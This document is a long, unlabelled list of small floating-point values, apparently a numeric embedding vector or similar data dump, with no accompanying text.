-0.01142199244350195, -0.01814681850373745, 0.02325243502855301, 0.015521072782576084, 0.002664037514477968, 0.024288145825266838, -0.002304821042343974, -0.006630007177591324, 0.030429473146796227, 0.009795489721000195, 0.011728329584002495, -0.005120203830301762, 0.004153783433139324, -0.012895327992737293, -0.0142009062692523, 0.027395278215408325, 0.02490082010626793, -0.0066956509836018085, 0.011050011962652206, 0.007373968604952097, -0.008606609888374805, -0.008380504325032234, -0.016265034675598145, 0.028547687456011772, 0.02339830994606018, 0.031071322038769722, -0.00646954495459795, 0.006414841860532761, -0.016513021662831306, 0.00961314607411623, -0.013201664201915264, -0.0021388884633779526, -0.014106088317930698, 0.0010685325833037496, -0.009117172099649906, -0.003271241206675768, -0.0026749782264232635, 0.002186297671869397, -0.03037112206220627, 0.03544756397604942, 0.008745190687477589, 0.009058821946382523, -0.02581983059644699, 0.005685468204319477, 0.011429286561906338, 0.0074432590045034885, 0.042653776705265045, -0.0019383106846362352, -0.018978305160999298, -0.0014669529628008604, -0.005251490976661444, -0.007147862575948238, -0.009153640829026699, 0.010087238624691963, -0.0040443772450089455, -0.005944395903497934, 0.00028058094903826714, -0.007133275270462036, -0.0019127826672047377, 0.0013794280821457505, -0.0086576659232378, 0.00467893248423934, 0.012319122441112995, 0.0026986829470843077, 0.008723310194909573, 0.032909344881772995, -0.013260014355182648, -0.0037216295022517443, 0.007330206222832203, 0.013267308473587036, 0.0003446290793363005, 0.02990432269871235, -0.003858387004584074, 0.006768588442355394, -0.007702186703681946, 0.017898831516504288, -0.017038170248270035, 0.01566694863140583, -0.010481100529432297, 0.008592022582888603, 0.014755230396986008, -0.0005857782671228051, -0.006520600989460945, -0.00228111632168293, -0.04854711517691612, 0.02762867696583271, -0.020553752779960632, 0.0034791126381605864, -0.014470774680376053, -0.010896843858063221, -0.00269321259111166, -0.009095290675759315, -0.015098036266863346, 0.0055432403460145, 0.020787151530385017, 0.011042718775570393, 0.008650372736155987, -0.0008943945285864174, -0.014616649597883224, 0.008942121639847755, 0.04317892715334892, 0.003705218667164445, 0.018628206104040146, 0.0141206756234169, 0.018000943586230278, -0.001856256159953773, 0.003645045217126608, -0.015331435948610306, 0.014645824208855629, 0.012122191488742828, 0.0014259256422519684, -0.009073409251868725, 0.0038693277165293694, 0.018569855019450188, 0.016469258815050125, 0.01559401024132967, -0.003234772477298975, 0.012399353086948395, -0.01608998514711857, 0.0007517107878811657, -0.015579422935843468, 0.002191768027842045, -0.007089512888342142, 0.01824893057346344, -0.01075096894055605, 0.032442543655633926, 0.002428814535960555, 0.014419718645513058, 0.0019182529067620635, -0.0035939891822636127, -0.009474565275013447, -0.012187834829092026, -0.018686555325984955, -0.020655864849686623, 0.0028226764407008886, 0.005422893911600113, 0.003659632755443454, 0.016629721969366074, -0.0036705732345581055, 0.009532914496958256, 0.0012235244503244758, -0.011152124032378197, 0.01788424327969551, -0.004274130333214998, -0.0027770905289798975, 0.016279621049761772, 0.005896986462175846, -0.004037083592265844, -0.03489324077963829, 0.004317892715334892, 0.0039532058872282505, 0.00963502749800682, 0.003134483704343438, 0.008314860984683037, -0.00809604860842228, 0.01468958705663681, -0.006870700512081385, -0.0017960828263312578, 0.029627161100506783, 0.005379131529480219, -0.017825894057750702, 0.02164781279861927, -0.015112623572349548, 0.0052369036711752415, 0.0263887420296669, -0.019357578828930855, 0.003634104738011956, -0.015068861655890942, -0.01840939372777939, -0.017971768975257874, 0.009066115133464336, -0.012756746262311935, 0.0035903421230614185, -0.0017140283016487956, 0.013588232919573784, -0.0011542339343577623, -0.005999098997563124, 0.017490381374955177, 0.004241308197379112, 0.009861133061349392, 0.0064075482077896595, 0.0045877606607973576, 0.011706448160111904, -0.013566351495683193, -0.012756746262311935, -0.010904137045145035, -0.00830027274787426, -0.021195601671934128, 0.005470302887260914, 0.005700055975466967, 0.0014833637978881598, 0.00444553280249238, 0.011473048478364944, 0.011079187504947186, 0.000022337069822242483, 0.016323383897542953, -0.005083735100924969, 0.005433834157884121, -0.014981336891651154, 0.0017194985412061214, -0.004518470261245966, 0.0058714584447443485, -0.005302547011524439, -0.023952633142471313, -0.0013848984381183982, 0.005196787882596254, 0.00047773978440091014, -0.003681513946503401, 0.0014860989758744836, -0.012093016877770424, 0.011101067997515202, -0.024827882647514343, 0.009503739885985851, 0.010007007978856564, 0.0035629908088594675, 0.0029448464047163725, 0.030283598229289055, -0.0014906575670465827, 0.002282939851284027, -0.009489152580499649, 0.028518512845039368, 0.02138523757457733, 0.0025363971944898367, -0.037198059260845184, -0.024871643632650375, 0.0028500279877334833, -0.01989731565117836, 0.003949558828026056, 0.007118687499314547, 0.004967035260051489, 0.015433548018336296, 0.03150894492864609, 0.004719048272818327, -0.007680305279791355, -0.01134176179766655, 0.0028992604929953814, 0.014003975316882133, 0.003045135410502553, 0.0004016114107798785, 0.0023558770772069693, -0.0014569240156561136, 0.015623185783624649, 0.008380504325032234, 0.008840009570121765, -0.007950173690915108, -0.0034572314471006393, 0.019926490262150764, 0.016615133732557297, -0.006166854873299599, 0.004339773673564196, 0.01512721087783575, -0.0019601918756961823, 0.02937917411327362, -0.029452111572027206, 0.0021735336631536484, -0.00332412077113986, -0.01810305565595627, 0.01409879419952631, 0.004704460501670837, -0.012158660218119621, 0.010926018469035625, -0.00868684146553278, 0.0002810368314385414, 0.0033915878739207983, 0.0104154571890831, 0.02185203693807125, 0.014171731658279896, -0.0023212318774312735, -0.012085722759366035, 0.01861361786723137, -0.02247929945588112, -0.015696123242378235, -0.009941363707184792, 0.008438854478299618, 0.031012970954179764, 0.0020878324285149574, -0.014485361985862255, 0.006144973915070295, 0.002760679693892598, 0.02005777694284916, 0.01131258625537157, -0.010605094023048878, 0.00404802430421114, 0.0011779385386034846, 0.023996395990252495, -0.0022318835835903883, 0.03562261164188385, 0.006371079478412867, 0.007789711467921734, -0.011764798313379288, -0.00426683621481061, -0.02077256329357624, 0.0016228565946221352, -0.02169157564640045, -0.0006682886742055416, 0.0016292385989800096, -0.009073409251868725, -0.0117575041949749, 0.0027552093379199505, -0.010218526236712933, -0.01262545958161354, -0.005587002728134394, -0.0066190664656460285, 0.012793214991688728, -0.020903851836919785, 0.005163966212421656, 0.0004569982411339879, 0.0052916062995791435, 0.009934070520102978, 0.009168228134512901, -0.019780615344643593, 0.0009135405998677015, 0.014397837221622467, 0.00043511702097021043, -0.010357107035815716, -0.017329920083284378, -0.010378988459706306, -0.015550248324871063, 0.008701428771018982, -0.01435407530516386, 0.03066287189722061, -0.005762052722275257, -0.004281423985958099, -0.0042084865272045135, 0.005754758603870869, 0.028270525857806206, -0.0061741485260427, 0.021924974396824837, 0.004471060819923878, 0.012997440062463284, 0.004409064073115587, -0.02329619787633419, -0.01193255465477705, 0.0052369036711752415, -0.012144072912633419, -0.007319265510886908, 0.014747937209904194, -0.006743060424923897, -0.0277307890355587, -0.011786679737269878, -0.019649328663945198, -0.011217768304049969, -0.0019328404450789094, -0.0010521216318011284, 0.013580938801169395, 0.03112967126071453, -0.005145731847733259, 0.015200148336589336, -0.012764040380716324, -0.00002824898729159031, -0.006163208279758692, 0.006542482413351536, -0.0319465696811676, -0.004547645337879658, -0.004241308197379112, 0.02902907505631447, 0.0117575041949749, -0.010692618787288666, 0.0009664202225394547, -0.00835132971405983, 0.0006582597852684557, 0.010335225611925125, -0.010714500211179256, -0.020393289625644684, 0.016104571521282196, 0.015987873077392578, 0.01340588927268982, 0.009168228134512901, 0.0023905225098133087, -0.012085722759366035, 0.0064075482077896595, -0.009751726873219013, 0.0027406217996031046, 0.011480342596769333, 0.003045135410502553, -0.004299658350646496, 0.01824893057346344, 0.0015052451053634286, -0.006815997418016195, 0.014952161349356174, 0.02046622708439827, -0.011502224020659924, -0.00481751374900341, -0.010072651319205761, -0.012056548148393631, 0.005794874392449856, 0.00971525814384222, 0.04329562559723854, 0.009605851955711842, 0.02376299723982811, 0.01686312071979046, 0.017694607377052307, -0.017971768975257874, -0.006655535195022821, 0.0015763590345159173, -0.008336741477251053, -0.006950931623578072, 0.003564814105629921, 0.004496589303016663, 0.0040407306514680386, -0.0003195568569935858, 0.014375956729054451, 0.015083448961377144, 0.03416386619210243, -0.01927005499601364, -0.006134033203125, 0.0007849884568713605, -0.004846688359975815, -0.00027465479797683656, 0.0018909013597294688, 0.0012681985972449183, 0.006754000671207905, 0.014273843728005886, -0.005791227333247662, 0.013580938801169395, 0.0016100924694910645, 0.00128825637511909, -0.008329448290169239, -0.010327932424843311, 0.018642792478203773, -0.007636542897671461, -0.020320352166891098, 0.006677416618913412, 0.010904137045145035, 0.016717245802283287, -0.01007994543761015, -0.004026142880320549, -0.023835932835936546, 0.010831199586391449, 0.026096992194652557, 0.003256653668358922, -0.023777583613991737, 0.0032183616422116756, 0.010116414166986942, 0.007417730987071991, -0.00623614527285099, -0.0016565901460126042, 0.0059152208268642426, -0.012129485607147217, 0.003821918275207281, -0.0059042805805802345, 0.01270569022744894, -0.014463481493294239, 0.000695184338837862, -0.01423008181154728, -0.01804470643401146, -0.007184331305325031, 0.0005114733357913792, -0.005667233839631081, 0.00034326151944696903, 0.010473807342350483, -0.00868684146553278, -0.04317892715334892, 0.0030998382717370987, 0.008635785430669785, -0.01157516147941351, 0.006743060424923897, 0.015564835630357265, 0.016527608036994934, -0.0053244284354150295, -0.003807330969721079, -0.018030118197202682, 0.004365301690995693, 0.004850335419178009, 0.01247229054570198, 0.015185561031103134, 0.0004273674276191741, -0.015696123242378235, -0.020699625834822655, 0.0008009435259737074, 0.014303019270300865, 0.007505255751311779, -0.02221672423183918, 0.0052806660532951355, -0.006356492172926664, 0.025455143302679062, 0.012756746262311935, 0.019547216594219208, -0.004438239149749279, -0.003101661801338196, 0.021560287103056908, -0.00912446528673172, -0.003982380498200655, -0.03238419443368912, -0.012968265451490879, 0.0033660598564893007, -0.009314103052020073, 0.012224303558468819, 0.000775415450334549, 0.00762924924492836, -0.007432318292558193, 0.007651130668818951, -0.005710996221750975, -0.03390129283070564, -0.005444774869829416, 0.005601590499281883, -0.0017824070528149605, -0.00751254940405488, -0.013347539119422436, 0.0005898810341022909, -0.008365917019546032, -0.0007954732282087207, 0.008205454796552658, 0.011706448160111904, 0.006896228529512882, -0.010663444176316261, 0.026520028710365295, -0.0049560945481061935, 0.018482331186532974, 0.011553280055522919, 0.027949601411819458, -0.005772992968559265, -0.0004663433355744928, 0.00048184252227656543, 0.00945997703820467, -0.0013630171306431293, -0.01829269342124462, -0.00026895655901171267, 0.0070639848709106445, 0.011706448160111904, -0.012297241017222404, -0.009117172099649906, -0.025542668998241425, 0.017140282317996025, 0.02128312550485134, 0.008759778924286366, -0.0020258354488760233, -0.0041647241450846195, -0.014171731658279896, 0.041632652282714844, 0.002126124454662204, -0.015710709616541862, -0.00948185846209526, -0.009489152580499649, 0.0006495984853245318, 0.012552522122859955, -0.0063200234435498714, -0.0023941693361848593, 0.03536003828048706, -0.009722552262246609, 0.006334610749036074, -0.0032985927537083626, -0.025630192831158638, -0.004832101054489613, -0.02226048707962036, -0.017490381374955177, 0.023792171850800514, 0.011473048478364944, 0.021020550280809402, -0.02360253408551216, 0.01918252930045128, -0.004452826455235481, -0.020597513765096664, -0.013114139437675476, 0.010196644812822342, 0.00664824154227972, 0.007370321545749903, 0.01340588927268982, -0.01342777069658041, 0.0021826508454978466, 0.0007808857480995357, 0.0039641461335122585, 0.012494171969592571, 0.014966748654842377, -0.013478826731443405, 0.01948886550962925, -0.026797190308570862, 0.003442644141614437, -0.005043619312345982, -0.02567395567893982, -0.01332565862685442, 0.012355591170489788, -0.01680477149784565, 0.010933312587440014, -0.008672254160046577, 0.009744432754814625, -0.01778213120996952, 0.022464711219072342, 0.019576391205191612, -0.004733635578304529, -0.006961872335523367, -0.0008597492706030607, -0.01763625629246235, -0.0013311071088537574, 0.006309082731604576, -0.006454957649111748, -0.008344035595655441, 0.022041674703359604, -0.03037112206220627, 0.01877407915890217, 0.023806758224964142, -0.008650372736155987, 0.0057839336805045605, 0.029656335711479187, -0.0011979963164776564, 0.003938618116080761, -0.010736381635069847, -0.027905838564038277, -0.00012285388947930187, 0.00969337671995163, -0.00794287957251072, -0.00751254940405488, -0.0053681908175349236, 0.010991661809384823, -0.025119630619883537, -0.024565307423472404, -0.012107604183256626, 0.030604522675275803, 0.03031277284026146, 0.010590506717562675, -0.0228439848870039, 0.023850521072745323, 0.003710688790306449, 0.007446906063705683, -0.019445104524493217, -0.009109877981245518, -0.018030118197202682, -0.013879981823265553, 0.011721036396920681, 0.025134218856692314, 0.0015417137183248997, -0.01922629214823246, 0.005353603046387434, -0.013384007848799229, -0.006976459641009569, 0.009241165593266487, -0.001482452149502933, -0.0064075482077896595, 0.0005588826024904847, 0.0022574118338525295, -0.0007371233077719808, -0.015287673100829124, 0.016994407400488853, 0.023019034415483475, 0.007147862575948238, -0.016177508980035782, 0.009773608297109604, -0.0014988629845902324, -0.01582740992307663, -0.019313815981149673, -0.013544470071792603, -0.017023583874106407, -0.006433076225221157, 0.009576677344739437, -0.01216595433652401, -0.0070749251171946526, -0.0027515625115484, 0.0027898545376956463, 0.006155914161354303, 0.00796476099640131, 0.0004542630922514945, -0.0007717685657553375, 0.013712226413190365, 0.030633697286248207, -0.01804470643401146, -0.004558586049824953, 0.012355591170489788, -0.0006149532273411751, -0.00463881716132164, -0.008438854478299618, -0.00015499192522838712, -0.00786264892667532, -0.0039057964459061623, -0.01578364707529545, 0.010823906399309635, 0.0023814053274691105, 0.007366674952208996, -0.011859617196023464, -0.0035101110115647316, 0.009955951943993568, -0.014237374998629093, -0.005444774869829416, 0.006637300830334425, 0.0038839152548462152, 0.0003886194317601621, -0.006549776066094637, 0.0008474410860799253, -0.007352087181061506, 0.008249216713011265, 0.01061968132853508, 0.008701428771018982, -0.04189522936940193, 0.012158660218119621, -0.023383721709251404, 0.008183573372662067, 0.010058064013719559, -0.01007994543761015, -0.006349198520183563, 0.008694134652614594, -0.007665717974305153, 0.001870843581855297, 0.0031308368779718876, -0.015856584534049034, 0.019109591841697693, 0.020597513765096664, -0.0021078900899738073, -0.004595054779201746, 0.024317320436239243, -0.007636542897671461, 0.03177151829004288, 0.015521072782576084, -0.02427355758845806, 0.016556784510612488, -0.003353295847773552, 0.014631236903369427, -0.0016885001678019762, 0.020174477249383926, -0.015521072782576084, 0.0004342053143773228, 0.015346023254096508, 0.006225205026566982, -0.004952447488903999, 0.018336456269025803, -0.0018726671114563942, -0.018030118197202682, 0.012304535135626793, -0.0061522675678133965, 0.015579422935843468, 0.012056548148393631, 0.0022118259221315384, 0.04632981866598129, 0.01020393893122673, 0.007053044158965349, -0.0003744878340512514, -0.003453584620729089, 0.03098379634320736, 0.0035976360086351633, 0.006852466147392988, -0.006848819553852081, 0.006837878841906786, -0.004605995025485754, 0.014937574043869972, 0.01097707450389862, -0.0025363971944898367, -0.0026275687851011753, -0.009197402745485306, -0.02050998993217945, 0.0396779328584671, -0.018540680408477783, -0.012041960842907429, -0.006265320349484682, -0.02506128139793873, -0.002171710366383195, -0.0011633511167019606, -0.023223260417580605, 0.007286443840712309, -0.02005777694284916, 0.008037698455154896, 0.001599151873961091, -0.01549189817160368, -0.013719519600272179, -0.017709193751215935, -0.0006979195168241858, -0.012056548148393631, 0.0017295274883508682, 0.010393575765192509, -0.002921141916885972, 0.00010678487160475925, -0.01342777069658041, -0.0009117171866819263, -0.023690059781074524, 0.005517712328583002, -0.0014760701451450586, 0.00870872288942337, 0.032909344881772995, -0.02144358865916729, 0.007541724480688572, 0.020218240097165108, -0.024609070271253586, 0.011086480692029, -0.004977975971996784, -0.014638531021773815, 0.011721036396920681, 0.014091501012444496, -0.0052369036711752415, -0.003433526959270239, 0.007760536391288042, 0.0025619252119213343, -0.003338708309456706, 0.013952919282019138, 0.0018188757821917534, 0.009015059098601341, 0.006298142019659281, -0.006247085984796286, -0.000011624393664533272, 0.008854596875607967, 0.007348440587520599, -0.018890779465436935, 0.02577606774866581, -0.014397837221622467, 0.031071322038769722, 0.010984368622303009, 0.0020221886225044727, -0.006746707018464804, 0.011735623702406883, 0.0020167184993624687, -0.011917966417968273, 0.016731834039092064, -0.022391773760318756, -0.007906411774456501, -0.009270340204238892, -0.0025418675504624844, 0.002554631559178233, 0.01865738071501255, 0.00220270873978734, -0.004478354938328266, -0.003161835251376033, 0.006130386143922806, 0.026782603934407234, 0.023587945848703384, -0.011502224020659924, 0.010524863377213478, 0.008110635913908482, 0.021487349644303322, 0.0041209617629647255, -0.0036979247815907, -0.013588232919573784, 0.01401856355369091, -0.00411002105101943, -0.005510418675839901, 0.010123707354068756, -0.008774366229772568, 0.017242394387722015, 0.03253006935119629, -0.03684796020388603, 0.018496917560696602, 0.0014177202247083187, -0.012041960842907429, -0.000902600004337728, -0.0038437996990978718, 0.032238319516181946, 0.004558586049824953, 0.021735336631536484, 0.009284927509725094, -0.0011788503034040332, -0.017869656905531883, -0.024258971214294434, 0.0173153318464756, -0.0003820094862021506, 0.012698397040367126, 0.005944395903497934, -0.0416618287563324, 0.0021662400104105473, -0.003455408150330186, -0.002521809656172991, -0.0001692374935373664, 0.007505255751311779, 0.01559401024132967, 0.006378373131155968, 0.0012508759973570704, -0.010349812917411327, 0.005185847170650959, 0.008694134652614594, 0.018307281658053398, -0.0005825872649438679, -0.003508287714794278, 0.0025564548559486866, 0.013551764190196991, 0.011618923395872116, 0.006480485666543245, 0.01896371692419052, -0.0005251491093076766, -0.013989388011395931, -0.006403901614248753, -0.0263887420296669, -0.004897744860500097, 0.024040158838033676, 0.0007968408172018826, -0.02370464615523815, -0.0022647054865956306, 0.023879695683717728, 0.020918438211083412, 0.00774594908580184, -0.006134033203125, -0.012822390533983707, -0.011648098938167095, -0.013384007848799229, -0.013945626094937325, -0.018365630879998207, -0.010408163070678711, 0.005419246852397919, -0.0006518777809105814, -0.008796247653663158, -0.006633654236793518, -0.03830670937895775, 0.018642792478203773, -0.009751726873219013, -0.003222008468583226, -0.0011925260769203305, -0.0063637858256697655, -0.02134147472679615, 0.0104154571890831, 0.0016921471105888486, -0.001244493992999196, 0.01928464137017727, -0.011786679737269878, 0.028620624914765358, 0.013376714661717415, 0.005973570980131626, 0.018234344199299812, -0.003681513946503401, -0.010444631800055504, -0.021429000422358513, -0.012333709746599197, 0.012844271957874298, -0.003147247713059187, 0.02272728644311428, -0.014602062292397022, 0.019663916900753975, -0.0010083592496812344, 0.019313815981149673, -0.009109877981245518, -0.0006240704096853733, 0.024609070271253586, 0.0012581696501001716, 0.020553752779960632, 0.012640046887099743, -0.002897437196224928, 0.0000956163348746486, 0.0076875993981957436, 0.008570141158998013, -0.008519085124135017, 0.02026200294494629, 0.006247085984796286, 0.01578364707529545, -0.010101825930178165, 0.009700670838356018, 0.007753242738544941, -0.0007448729011230171, 0.01943051628768444, -0.0024689300917088985, -0.025221744552254677, 0.015302261337637901, 0.027614090591669083, -0.002302997512742877, 0.018584443256258965, -0.02665131725370884, -0.017446620389819145, -0.00012855212844442576, 0.005255137570202351, 0.0020294825080782175, 0.014412425458431244, -0.0036268108524382114, -0.012406647205352783, -0.004172017797827721, 0.0061960299499332905, 0.0018799607641994953, 0.005926161538809538, -0.016367146745324135, 0.011093774810433388, 0.01751955784857273, -0.0023795817978680134, 0.032238319516181946, 0.011772092431783676, -0.016775596886873245, 0.0012025549076497555, 0.004777397960424423, -0.00997053924947977, 0.0035757548175752163, -0.014419718645513058, -0.012144072912633419, 0.020247414708137512, 0.024550719186663628, 0.00981737021356821, 0.007326559163630009, -0.008985884487628937, -0.026213692501187325, -0.007804298773407936, -0.006163208279758692, 0.008942121639847755, 0.011217768304049969, -0.0016529432032257318, -0.012435821816325188, 0.011174005456268787, 0.01808846928179264, -0.016017047688364983, 0.011093774810433388, 0.005313487723469734, -0.010174763388931751, -0.0036359280347824097, -0.011604336090385914, 0.023894283920526505, 0.018496917560696602, -0.003096191445365548, 0.044666849076747894, 0.019095003604888916, -0.01943051628768444, 0.010021595284342766, -0.006918109953403473, 0.002315761521458626, -0.0034444674383848906, -0.015375198796391487, 0.007005634717643261, -0.000902600004337728, -0.017023583874106407, 0.014966748654842377, -0.004255895968526602, -0.006582598201930523, 0.0056599401868879795, 0.0030834274366497993, -0.008832716383039951, 0.0032821819186210632, 0.022406361997127533, -0.005517712328583002, 0.006258026696741581, -0.002244647592306137, -0.02809547632932663, 0.0059152208268642426, 0.0059152208268642426, 0.02457989566028118, -0.006823291536420584, -0.014397837221622467, 0.024258971214294434, 0.008402385748922825, 0.019824378192424774, 0.002948493231087923, 0.012319122441112995, -0.012195128947496414, 0.00959126465022564, -0.007541724480688572, 0.018263518810272217, -0.00046565954107791185, 0.0015325965359807014, -0.005050912965089083, -0.01247229054570198, 0.01695064641535282, -0.010364401154220104, -0.011370936408638954, -0.033697064965963364, 0.009700670838356018, 0.02077256329357624, -0.014915692619979382, 0.0013621054822579026, 0.003497347002848983, -0.011509517207741737, 0.006841525435447693, -0.0034517613239586353, -0.0011432933388277888, -0.009080703370273113, -0.011458461172878742, -0.00548853725194931, -0.0034827596973627806, -0.016425495967268944, 0.014208200387656689, 0.003156364895403385, 0.023106560111045837, 0.0035538736265152693, -0.004923272877931595, -0.0034590549767017365, -0.011494929902255535, 0.0049560945481061935, -0.016833946108818054, 0.001077649649232626, 0.027249403297901154, 0.003205597633495927, -0.008832716383039951, 0.0032876520417630672, -0.001555389491841197, 0.01835104264318943, -0.024186033755540848, -0.0014806287363171577, 0.009314103052020073, -0.011815854348242283, -0.01566694863140583, -0.006681063212454319, 0.014551006257534027, 0.013420476578176022, -0.022085437551140785, -0.005229609552770853, -0.01273486576974392, -0.001118676969781518, 0.025280093774199486, 0.011772092431783676, 0.012486878782510757, -0.021983323618769646, 0.025221744552254677, 0.009299514815211296, -0.02670966647565365, 0.01989731565117836, -0.015141799114644527, -0.0042121331207454205, -0.013267308473587036, -0.015710709616541862, 0.01201278530061245, -0.0006960960454307497, -0.004306952003389597, 0.02005777694284916, -0.0015754472697153687, -0.019459690898656845, -0.0016921471105888486, -0.024506958201527596, -0.002773443702608347, -0.010758263058960438, 0.0052004349417984486, -0.007680305279791355, 0.026111580431461334, -0.005098322406411171, -0.006553423125296831, -0.002859144937247038, 0.011706448160111904, -0.01018205750733614, -0.006061095744371414, 0.005459362640976906, 0.03413468971848488, -0.021005963906645775, 0.0020495401695370674, 0.01804470643401146, -0.03150894492864609, -0.0008725133375264704, -0.03530168905854225, -0.02514880709350109, 0.002193591557443142, -0.001332018757238984, -0.010867668315768242, -0.004482001531869173, -0.020597513765096664, 0.00809604860842228, 0.013398595154285431, 0.032296668738126755, -0.021151838824152946, -0.03506828844547272, -0.02457989566028118, 0.03515581414103508, 0.014857343398034573, -0.0061522675678133965, 0.006918109953403473, 0.015462723560631275, 0.00015316848293878138, 0.012282653711736202, -0.00318371644243598, -0.010291463695466518, -0.015637772157788277, -0.013201664201915264, -0.006983753759413958, -0.04382077232003212, 0.003982380498200655, 0.02242094837129116, 0.023806758224964142, 0.001026593497954309, -0.0037216295022517443, 0.015170973725616932, -0.008052285760641098, 0.013106846250593662, -0.011283411644399166, 0.011319880373775959, -0.0007863560458645225, -0.00945997703820467, -0.004186605103313923, 0.005685468204319477, -0.011385523714125156, -0.003821918275207281, -0.009642320685088634, -0.00642942963168025, 0.0220125000923872, 0.0010038006585091352, 0.006713885348290205, 0.007348440587520599, 0.013420476578176022, 0.018380219116806984, 0.0008565582684241235, -0.005539593752473593, 0.0064841327257454395, 0.015185561031103134, -0.009080703370273113, -0.0006746707367710769, -0.003475465811789036, -0.008745190687477589, 0.0029685511253774166, -0.007490668445825577, 0.029495874419808388, 0.010780143551528454, 0.013347539119422436, -0.00513114407658577, 0.0047883386723697186, -0.02417144551873207, 0.01871572993695736, 0.007651130668818951, -0.011786679737269878, -0.016979821026325226, 0.008161691948771477, 0.007446906063705683, 0.0053681908175349236, -0.02237718552350998, -0.03851093351840973, 0.012683809734880924, 0.0006974636344239116, 0.00961314607411623, 0.005353603046387434, 0.0066956509836018085, -0.015346023254096508, -0.01918252930045128, -0.010152882896363735, -0.00017995017697103322, 0.0270597655326128, -0.0017222337191924453, 0.014485361985862255, -0.0055724154226481915, 0.007169743999838829, 0.003821918275207281, 0.00017767088138498366, 0.01332565862685442, -0.006243439391255379, -0.002676801523193717, -0.013726813718676567, -0.0020367761608213186, -0.000495062442496419, -0.002552808029577136, 0.017388269305229187, -0.004252248909324408, 0.010918725281953812, 0.0041209617629647255, -0.009248458780348301, 0.0032110679894685745, 0.003975086845457554, 0.007497962098568678, 0.009160934016108513, 0.011648098938167095, 0.013252721168100834, 0.018219755962491035, 0.0013548117130994797, -0.010823906399309635, 0.0008141634170897305, -0.0073557342402637005, 0.014244669117033482, -0.01007994543761015, 0.017650844529271126, 0.009707964025437832, 0.00796476099640131, 0.002780737355351448, 0.017402857542037964, -0.008956709876656532, -0.011896085925400257, 0.017461206763982773, 0.0033988815266638994, 0.013012027367949486, 0.027395278215408325, 0.0008305743685923517, 0.010378988459706306, 0.019211703911423683, 0.010823906399309635, 0.0017723782220855355, 0.010758263058960438, -0.00031841720920056105, -0.02293151058256626, 0.0004091330920346081, -0.017256982624530792, 0.02077256329357624, -0.001856256159953773, -0.017855068668723106, -0.00631272979080677, -0.010167470201849937, -0.006134033203125, 0.047350943088531494, 0.014346781186759472, -0.019926490262150764, 0.00007595743954880163, 0.012953677214682102, -0.003763568587601185, -0.00878895353525877, 0.025528080761432648, -0.0031217196956276894, 0.030487822368741035, -0.0077678305096924305, 0.0000838209962239489, 0.006126739550381899, 0.0018115820130333304, 0.0019273700891062617, 0.004069905262440443, 0.02581983059644699, 0.004591407719999552, -0.0011241473257541656, 0.015170973725616932, 0.0010010654805228114, 0.007129628211259842, 0.017096521332859993, 0.017344508320093155, 0.002501751994714141, -0.00336241303011775, -0.007519843056797981, -0.009780901484191418, -0.03442643955349922, -0.01378516387194395, -0.0004763722245115787, 0.011531398631632328, -0.006845172494649887, -0.018336456269025803, 0.0010229466715827584, -0.0011359995696693659, -0.0066956509836018085, -0.009934070520102978, -0.007651130668818951, 0.022566823288798332, -0.02479870617389679, -0.007716774009168148, -0.010116414166986942, 0.008438854478299618, -0.0013730460777878761, -0.00927763432264328, 0.0032402428332716227, 0.0020167184993624687, -0.006411195266991854, 0.0064950729720294476, -0.012078428640961647, 0.009015059098601341, 0.0014277490554377437, -0.008205454796552658, -0.0019218998495489359, 0.016731834039092064, -0.009605851955711842, 0.0031198961660265923, 0.025951117277145386, 0.005419246852397919, 0.012676515616476536, 0.023106560111045837, -0.0007093159365467727, 0.008088754490017891, 0.024346495047211647, -0.02138523757457733, -0.021939562633633614, -0.0065753040835261345, 0.0061194454319775105, 0.01018205750733614, 0.0028883200138807297, -0.012669221498072147, 0.0034152925945818424, -0.005692761857062578, 0.005284312646836042, 0.010174763388931751, 0.0013693991350010037, 0.0010867668315768242, 0.0016383557813242078, 0.01319437101483345, 0.011035424657166004, -0.02278563566505909, 0.009335983544588089, 0.013588232919573784, 0.014777111820876598, 0.004945153836160898, -0.03320109099149704, -0.010473807342350483, -0.002917494857683778, 0.008314860984683037, 0.008329448290169239, -0.002033129334449768, -0.03127554431557655, 0.009875720366835594, 0.009190109558403492, -0.013559057377278805, -0.009802782908082008, -0.0015854762168601155, 0.032442543655633926, -0.01639632135629654, -0.003161835251376033, -0.0027697968762367964, 0.024915406480431557, 0.017242394387722015, -0.010707206092774868, 0.0258781798183918, 0.005229609552770853, 0.013048496097326279, 0.03217997029423714, -0.015068861655890942, 0.015112623572349548, 0.004409064073115587, -0.00039203837513923645, -0.01026228815317154, 0.002994079142808914, -0.02169157564640045, 0.008125223219394684, -0.033638715744018555, -0.0008428825531154871, -0.003154541365802288, 0.01576906070113182, 0.01906582899391651, -0.0016410909593105316, 0.011990903876721859, -0.02215837500989437, -0.005218669306486845, 0.016936058178544044, 0.002363170962780714, -0.014040444046258926, -0.00892024114727974, -0.0060282740741968155, 0.006834231782704592, 0.015477310866117477, -0.002919318387284875, 0.05161048471927643, 0.012844271957874298, 0.006538835354149342, -0.012085722759366035, -0.0025291035417467356, -0.0024251677095890045, -0.0047445762902498245, -0.016119159758090973, -0.016688071191310883, 0.005222315900027752, -0.014835461974143982, -0.0038839152548462152, -0.0071989186108112335, -0.00889106560498476, -0.011502224020659924, 0.00474092923104763, 0.010473807342350483, 0.002815382555127144, -0.025601018220186234, -0.015696123242378235, -0.00959126465022564, -0.008497203700244427, 0.007297384086996317, -0.009343277662992477, -0.006061095744371414, -0.005762052722275257, -0.007702186703681946, 0.01226806640625, 0.014966748654842377, -0.02628662995994091, 0.022348010912537575, -0.0033697066828608513, 0.01881784200668335, -0.0072426809929311275, 0.018949130550026894, 0.005229609552770853, -0.013566351495683193, 0.025907354429364204, 0.0027460921555757523, -0.016017047688364983, 0.004193899221718311, 0.0067321197129786015, -0.014602062292397022, -0.01327460166066885, 0.004350714385509491, 0.0015955050475895405, -0.0027315046172589064, -0.017038170248270035, 0.013792457059025764, -0.025849005207419395, -0.011866910383105278, 0.008723310194909573, -0.027614090591669083, -0.0031144258100539446, -0.0002345392422284931, 0.004697166848927736, -0.004627876449376345, 0.006188736297190189, -0.00902235321700573, 0.005678174551576376, -0.010940605774521828, -0.0001361877511953935, 0.002501751994714141, 0.004153783433139324, -0.010612388141453266, 0.016979821026325226, 0.004529410973191261, 0.0033824706915766, -0.025455143302679062, -0.005470302887260914, -0.00601733336225152, -0.00312536652199924, -0.0013493414735421538, 0.00393132446333766, -0.01020393893122673, -0.021779099479317665, 0.030837921425700188, -0.007826180197298527, 0.015433548018336296, 0.013821632601320744, -0.01763625629246235, -0.004948800895363092, 0.005911574233323336, -0.0031417773570865393, 